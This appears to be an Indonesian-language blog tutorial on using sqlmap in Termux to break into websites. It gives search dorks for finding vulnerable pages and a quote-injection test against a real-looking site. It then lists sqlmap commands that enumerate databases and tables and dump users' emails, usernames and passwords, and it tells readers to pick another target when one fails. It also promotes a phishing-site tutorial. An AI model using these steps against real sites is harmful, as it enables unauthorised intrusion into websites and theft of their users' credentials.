Cara menggunakan sqlmap di termux untuk mengetahui isi database

Kunjungi segera

Assalamualaikum wr wb
Pada artikel kali ini. Saya akan memberitahukan bagaimana cara menggunakan sqlmap di termux.
Sqlmap ini script di termux  untuk penetrasi sebuah web. Bagaimana cara-caranya. Simak berikut.

Bahan:
- Apk termux, kalau belum punya silahkan download Disini
- Koneksi internet
- Dork:
     - store.php?=id
     - product.php?=id

Cara menggunakannya:
1. Pertama ketikkan dork diatas di browser
2. Masuklah ke website yang akan dijadikan target
3. Untuk mengetahui webnya vuln atau tidak tambahkan tanda ' di paling belakang sendiri untuk mengecek apakah web tersebut vuln atau tidak.
Contoh:

         http://coda.cc/product/product.php?id=4'

Dan hasilnya jadi seperti ini.

         http://coda.cc/product/product.php?id=4%27

4. Jika webnya vuln maka akan muncul pesan seperti dibawah ini.

      Error: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1
SELECT tbl_store.* FROM tbl_store WHERE store_id =1


4. Terus kalian buka termux, kemudian kalian ikuti perintah-perintah di bawah ini
     
        $ apt update && apt upgrade
        $ pkg install python2
        $ pkg install python
        $ pkg install figlet
        $ pkg install git
        $ git clone  https://github.com/sqlmapproject/sqlmap
        $ cd sqlmap

Untuk menjalankannya ketikkan perintah

        $ python2 sqlmap.py

5. Setelah sudah mengisi script diatas tersebut   lalu kalian isi perintah

         $ python2 sqlmap.py -u http://namaweb.com/store.php?id21%27 --dbs


    Tunggu sebentar sampai berhasil. Jika berhasil akan muncul database seperti di bawah ini:

available databases [2]:
[*] information_schema
[*] nama_database

Jika tidak berhasil. Cari target yang lain

6. Jika berhasil ketikkan

         $ python2 sqlmap.py -u http://namaweb.com/store.php?id21%27 -D nama database --tables

Setelah anda mengetik diatas. Maka akan muncul tables/file database tersebut

7. Langkah selanjutnya adalah ketik

        $ python2 sqlmap.py -u http://namaweb.com/store.php?id21%27 -D nama database -T nama tables --columns

9. Untuk dump email target ketikkan perintah

        $ python2 sqlmap.py -u http://namaweb.com/store.php?id21%27 -D nama database -T nama tables -C email, username,pass --dump

Maka dari itu, akan muncul email, password user.

Baca juga: Cara membuat web phising yang mudah

Sekian dari kami semoga bermanfaat bagi kalian semua. Kami mengucapkan mohon maaf bila ada kesalahan tulisan yang salah dan tidak berkenan. Saya akhiri
Waalaikumsalam Wr wb

4 comments :

Post a Comment

Leave A Comment...